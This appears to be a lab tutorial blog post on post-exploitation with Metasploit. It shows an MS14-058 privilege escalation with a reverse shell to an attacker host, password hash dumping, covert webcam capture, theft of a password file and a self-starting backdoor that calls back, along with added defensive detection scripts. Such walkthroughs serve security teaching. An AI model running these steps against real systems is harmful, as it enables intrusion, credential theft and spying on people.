Seeing Red: The Fun Stuff

The Fun Stuff: Privilege Escalation, Exfiltration, and Persistence

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we successfully exploited our Victim using a client-side attack targeting an old version of Microsoft Internet Explorer.  We ended with a Meterpreter session confirming our access to the Victim machine.  In this part, we’ll explore the capabilities of Meterpreter including privilege escalation and data exfiltration.

Privilege Escalation

We talked a bit about Meterpreter in the last post; now let’s play with some of its many functions.  Our Meterpreter session is currently running inside the Notepad process as the lower-privileged “eric” user.  We want to escalate our privileges to gain full control of the system.  In Windows, the highest-privileged account is “SYSTEM”.

Meterpreter has a built-in “getsystem” command that will attempt to use various techniques to elevate our user to SYSTEM.  Let’s give it a try.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

Hmm, no luck.  No worries, let’s try a local exploit.  MS14-058 seems like a good one.

meterpreter > background
Backgrounding session 1...
msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(ms14_058_track_popup_menu) > set LPORT 5555
LPORT => 5555
msf exploit(ms14_058_track_popup_menu) > exploit
[*] Started reverse handler on 10.0.1.10:5555
[*] Launching notepad to host the exploit...
[+] Process 1556 launched.
[*] Reflectively injecting the exploit DLL into 1556...
[*] Injecting exploit into 1556...
[*] Exploit injected. Injecting payload into 1556...
[*] Payload injected. Executing exploit...
[*] Sending stage (770048 bytes) to 10.0.1.11
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (10.0.1.10:5555 -> 10.0.1.11:49209) at 2015-07-26 17:04:37 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Success!  We’re now running as SYSTEM.

A Little Bit of Fun

So now what?  The first thing an attacker will likely do is dump password hashes.  This is easy to do with Meterpreter.  These hashes can then be cracked offline, giving us, the Attacker, passwords to try against the Victim’s online accounts.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
eric:1000:aad3b435b51404eeaad3b435b51404ee:7a08e99f765c50c0f1768692200e6db5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
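As an added audit example (not code from the original post), the following parses hashdump-format lines and reports what a defender should act on in them: the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the well-known hash of an empty password, so Administrator and Guest above have blank passwords, and the LM field aad3b435b51404eeaad3b435b51404ee means no LM hash is stored. The sample lines are copied from the output above.

```python
# Added audit helper (not from the original post): parse pwdump/hashdump-format
# lines (user:RID:LM:NT:::) and flag accounts whose stored hashes reveal a
# blank password or legacy LM storage.
# Well-known constants: LM field meaning "no LM hash stored", and the NT hash
# of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

def parse_hashdump(text):
    """Return one dict per non-empty user:rid:lm:nt::: line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed hashdump line: {line!r}")
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries

def audit_hashes(entries):
    """Map each username to the list of findings a defender would act on."""
    findings = {}
    for e in entries:
        issues = []
        if e["nt"] == EMPTY_NT:
            issues.append("blank password")
        if e["lm"] != EMPTY_LM:
            issues.append("LM hash stored (legacy, weak hash)")
        if e["rid"] == 500 and e["nt"] == EMPTY_NT:
            issues.append("built-in Administrator has no password; confirm it is disabled")
        findings[e["user"]] = issues
    return findings

# Constructed sample: the three lines from the hashdump output above.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
eric:1000:aad3b435b51404eeaad3b435b51404ee:7a08e99f765c50c0f1768692200e6db5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    for user, issues in audit_hashes(parse_hashdump(SAMPLE)).items():
        print(user, "->", issues or ["no finding"])
```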

How about a screenshot of the desktop?

meterpreter > screenshot
Screenshot saved to: /root/mUSXxVRT.jpeg

[Image: exploit_screenshot (screenshot of the Victim desktop)]

Got a webcam? Let’s take a picture and stream some video!

meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/SCCMCDyI.jpeg

meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: zwuaLciW.html
[*] Streaming...

What files are on the system?  Perhaps a password file…

meterpreter > ls

Listing: c:\Users\eric\Desktop
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2015-07-26 17:13:01 -0500 .
40777/rwxrwxrwx 0 dir 2014-11-11 19:36:51 -0600 ..
100666/rw-rw-rw- 282 fil 2014-11-11 20:06:50 -0600 desktop.ini
100666/rw-rw-rw- 113 fil 2015-07-26 17:12:27 -0500 my_passwords.txt

meterpreter > cat my_passwords.txt
Top Secret Passwords
+ Bank: no-one-will-guess-this-password
+ Email: password!@#$
+ Amazon: shoptilyoudrop192

meterpreter > download my_passwords.txt
[*] downloading: my_passwords.txt -> my_passwords.txt
[*] downloaded : my_passwords.txt -> my_passwords.txt

This is but a small sampling of the many commands Meterpreter provides.  Play with the other commands to see what else Meterpreter can do.

Persistence

Now that we’ve compromised our Victim machine, let’s install a persistent backdoor that allows us back in even if the machine is restarted.  To do this, we’ll generate a backdoor that autostarts and periodically calls back to our Attacker machine.

meterpreter > run persistence -S -i 5 -p 1337 -r 10.0.1.10
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-FDN9DNVQ5IR_20150726.4130/WIN-FDN9DNVQ5IR_20150726.4130.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.0.1.10 LPORT=1337
[*] Persistent agent script is 148420 bytes long
[+] Persistent Script written to C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[*] Executing script C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[+] Agent executed with PID 2008
[*] Installing as service..
[*] Creating service dexYVTDwgSWcORt
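The output above leaves two host artifacts a defender can alert on: a script dropped in a user’s Temp directory, and a new auto-start service with a random-looking name. As an added detection example (not from the original post), the following scores Service Control Manager “service installed” events (System log, Event ID 7045) on those indicators. The event records are constructed inline in a simplified dict form, and the ImagePath of the first one is an assumption about how such a service would launch the script, not something the post shows.

```python
# Added detection example (not part of the original post): flag Event ID 7045
# records whose image path runs a script from a user's Temp directory, uses a
# script host or shell, auto-starts, or carries a random-looking service name.
# Event fields are simplified dicts, not parsed from real EVTX.
import math
import re
from collections import Counter

TEMP_SCRIPT = re.compile(
    r"\\AppData\\Local\\Temp\\[^\\]+\.(vbs|js|wsf|bat|ps1)\b", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe")

def shannon_entropy(s):
    """Bits per character; random-looking names score high."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def suspicious_service_install(event):
    """Return the list of indicators this 7045 event triggers."""
    if event.get("EventID") != 7045:
        return []
    reasons = []
    path = event.get("ImagePath", "")
    name = event.get("ServiceName", "")
    if TEMP_SCRIPT.search(path):
        reasons.append("service image runs a script from a user Temp directory")
    if any(h in path.lower() for h in SCRIPT_HOSTS):
        reasons.append("service image is a script host or shell")
    if event.get("StartType", "").lower().startswith("auto"):
        reasons.append("auto-start")  # survives reboot; normal on its own
    if len(name) >= 12 and name.isalpha() and shannon_entropy(name) > 3.3:
        reasons.append("random-looking service name")
    return reasons

def is_suspicious(event):
    """Two or more independent indicators; auto-start alone is normal."""
    return len(suspicious_service_install(event)) >= 2

# Constructed sample events modelled on the persistence output above.
# The first ImagePath is an assumed launch command, not taken from the post.
EVENTS = [
    {"EventID": 7045, "ServiceName": "dexYVTDwgSWcORt",
     "ImagePath": r"cscript.exe //B C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]
```

Running it over EVENTS flags only the first record; the Spooler install trips nothing but the auto-start check.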

Back on our Attacker machine, we’ll set up a Meterpreter handler to accept any incoming connections from our Victim machine.

msf exploit(ms14_058_track_popup_menu) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(handler) > set LPORT 1337
LPORT => 1337

Run the handler on the Attacker and restart the Victim machine. If all goes well we should be reconnected as SYSTEM.

msf exploit(handler) > exploit
[*] Started reverse handler on 10.0.1.10:1337
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.0.1.11
[*] Meterpreter session 7 opened (10.0.1.10:1337 -> 10.0.1.11:49161) at 2015-07-26 17:47:55 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Too easy!
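On the network side, the agent installed with -i 5 -p 1337 retries its callback at a fixed interval, which is the signature a defender looks for in firewall or NetFlow data. As an added example (not from the original post), the following groups connection attempts by source, destination and port and reports the groups whose inter-arrival times are nearly constant. The log lines are constructed in a simple “epoch src dst dport” format, not taken from any real export.

```python
# Added detection example (not part of the original post): find fixed-interval
# callbacks ("beacons") in a connection log by measuring how regular the gaps
# between attempts to the same destination/port are.
import statistics
from collections import defaultdict

def parse_conn_log(text):
    """Group timestamps by (src, dst, dport) from 'epoch src dst dport' lines."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows[(src, dst, int(dport))].append(float(ts))
    return flows

def find_beacons(flows, min_hits=5, max_cv=0.1):
    """Return flows whose gaps have a coefficient of variation <= max_cv."""
    beacons = {}
    for key, times in flows.items():
        if len(times) < min_hits:
            continue
        times = sorted(times)
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            beacons[key] = {"hits": len(times), "interval": round(mean, 2),
                            "cv": round(cv, 3)}
    return beacons

# Constructed sample: the Victim (10.0.1.11) retrying 10.0.1.10:1337 about every
# 5 s (the post's -i 5 -p 1337 settings) mixed with irregular HTTPS traffic to
# a documentation-range address.
SAMPLE_LOG = """\
1437948000.0 10.0.1.11 10.0.1.10 1337
1437948005.1 10.0.1.11 10.0.1.10 1337
1437948010.0 10.0.1.11 10.0.1.10 1337
1437948015.2 10.0.1.11 10.0.1.10 1337
1437948019.9 10.0.1.11 10.0.1.10 1337
1437948025.0 10.0.1.11 10.0.1.10 1337
1437948001.0 10.0.1.11 198.51.100.10 443
1437948017.5 10.0.1.11 198.51.100.10 443
1437948019.0 10.0.1.11 198.51.100.10 443
1437948060.0 10.0.1.11 198.51.100.10 443
1437948062.0 10.0.1.11 198.51.100.10 443
"""

if __name__ == "__main__":
    for key, info in find_beacons(parse_conn_log(SAMPLE_LOG)).items():
        print(key, info)
```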

Conclusion

Throughout this series we’ve walked through a typical client-side attack.  We started with a basic understanding of penetration testing tools and what is commonly used.  We performed reconnaissance on our Victim machine and determined what vulnerable software could be exploited.  We then set up a client-side attack and compromised our Victim machine, gaining low-privilege access.  Finally, we executed a local privilege escalation exploit to gain SYSTEM privileges, used Meterpreter to demonstrate our control over the system including data exfiltration, and created a persistent backdoor so we can re-establish access at any time.

Hopefully, this has been an eye-opening experience to see just how easy it is to compromise a system and why it is so important to stay up to date with software patches and apply basic security principles.  In the next series, we’ll investigate how to detect malicious activity and defend a network using open source security tools.
